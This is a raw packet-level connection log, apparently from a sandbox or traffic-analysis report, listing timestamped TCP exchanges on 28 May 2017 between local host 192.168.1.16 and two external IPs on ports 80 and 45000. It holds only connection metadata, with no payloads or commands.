Mai 28, 2017 17:18:56.138075113 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.146353006 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.146384954 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.146394014 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.146480083 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.146502018 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.146678925 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.146725893 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.156625986 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.156653881 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.156805038 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.156847954 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.162739992 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.162941933 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.162983894 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.165383101 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.165415049 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.165769100 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.165808916 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.166963100 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.166994095 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.167402983 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.167438030 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.197824955 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.198107958 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.198151112 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.202780008 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.202807903 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.203030109 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.203073978 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.215271950 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.215302944 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.215312958 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.215528965 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.215574980 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.229916096 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.229943991 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.229953051 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.230176926 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.248138905 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.248168945 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.248177052 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.248336077 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.251549006 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.251576900 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.251586914 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.251810074 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.264018059 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.269937992 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.269963980 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.270185947 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.270230055 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.289419889 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.289449930 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.289458990 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.289649010 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.289695024 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.293304920 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.293492079 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.293535948 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.297403097 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.297431946 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.297662973 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.297707081 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.297914982 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.297945976 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.298147917 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.298182964 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.305953979 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.305983067 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.306162119 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.306202888 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.310024023 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.310055017 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.310302973 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.310343027 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.313894987 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.313925982 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.314146042 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.314191103 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.315434933 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.315447092 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.315851927 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.315884113 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.316643000 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.316673994 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.317394972 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.317615032 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.320229053 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.322766066 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.322793007 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.322926998 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.323930979 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.323961020 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.323971987 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.324098110 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.325717926 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.325747013 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.325757027 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.325882912 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.326925993 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.326956034 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.327133894 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.328254938 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.328289032 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.328299046 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.328699112 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.329041958 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.329071999 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.329082012 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.329179049 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.329952955 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.330796003 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.331162930 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.331197023 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.332259893 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.332288027 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.332518101 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.332554102 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.332814932 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.332851887 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.332945108 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.332969904 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.333379030 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.333408117 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.333740950 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.333766937 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.333897114 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.333928108 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.334139109 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.334163904 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.334422112 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.335946083 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.335975885 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.335984945 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.336360931 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.336395979 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.338120937 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.338149071 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.338243008 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.338269949 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.339323997 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.339354038 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.339363098 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.339489937 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.339518070 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.339894056 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.339921951 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.340379953 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.340404034 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342016935 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342046976 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342056036 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342200041 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.342228889 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342567921 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342962980 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.342986107 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.343103886 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.343138933 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.343293905 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.343317986 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.343596935 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.343621969 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.344383955 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.344408035 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.344455004 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.344494104 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.345571041 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.345593929 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.345623016 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.345937014 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.346091032 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.346118927 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.346128941 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.346313953 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.347213984 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.347559929 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.347934008 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.348637104 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.348664045 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.348949909 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.348975897 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.349559069 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.349916935 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.349940062 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.350203037 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.350229979 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.350328922 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.350353956 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.353327990 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.353363037 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.353696108 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.353718996 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.354337931 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.354357958 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.354690075 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.354715109 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.355911970 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.355946064 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.356045961 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.356070042 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.357883930 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.358248949 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.358270884 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.358464003 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.358707905 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.358728886 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360023975 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360053062 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360152006 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.360184908 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360613108 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360641003 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360719919 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.360744953 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360786915 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.360810995 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.361485958 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.361500025 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.361521959 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.361799002 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.361819983 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.361886978 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.361910105 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.362384081 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.372849941 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.372872114 MESZ	80	49234	46.21.169.110	192.168.1.16
Mai 28, 2017 17:18:56.373064995 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:18:56.807858944 MESZ	49234	80	192.168.1.16	46.21.169.110
Mai 28, 2017 17:19:48.265221119 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:48.265254974 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:48.266062975 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:48.269475937 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:48.269496918 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:48.826473951 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:49.028496027 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:49.028606892 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:49.051337957 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:49.051362991 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:49.306724072 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:49.540488958 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:49.540601015 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:49.871303082 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:49.871328115 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.332631111 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.346354961 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.346384048 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.346579075 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.346625090 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.352389097 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.352662086 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.352703094 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.360784054 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.360812902 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.361031055 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.361072063 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.405903101 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.406213999 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.406255007 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.432013988 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.432041883 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.432192087 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.432205915 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.432226896 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.433546066 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.433571100 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.445943117 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.445970058 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.446094990 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.446120977 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.473911047 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.474088907 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.474112034 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.478693962 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.478720903 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.478863955 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.478887081 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.487189054 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.487214088 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.487337112 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.487360001 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.538038969 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.538069963 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.538228035 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.538248062 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.556904078 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.557054996 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.557085037 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.619942904 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.619967937 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.620569944 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.620587111 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.627635956 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.627645016 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.630265951 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.630280972 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.641228914 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.641253948 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.641329050 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.641352892 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.782835960 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.783113956 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.783153057 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.821706057 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.821722984 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.821954012 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.821993113 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.920717955 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.920975924 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.921024084 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.934120893 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.934153080 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.934335947 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.934382915 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.988020897 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.988049984 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:50.988306046 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:50.988351107 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.009366035 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.009397030 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.009648085 MESZ	49235	45000	192.168.1.16	185.159.82.38
Mai 28, 2017 17:19:51.009687901 MESZ	45000	49235	185.159.82.38	192.168.1.16
Mai 28, 2017 17:19:51.014925003 MESZ	45000	49235	185.159.82.38	192.168.1.16
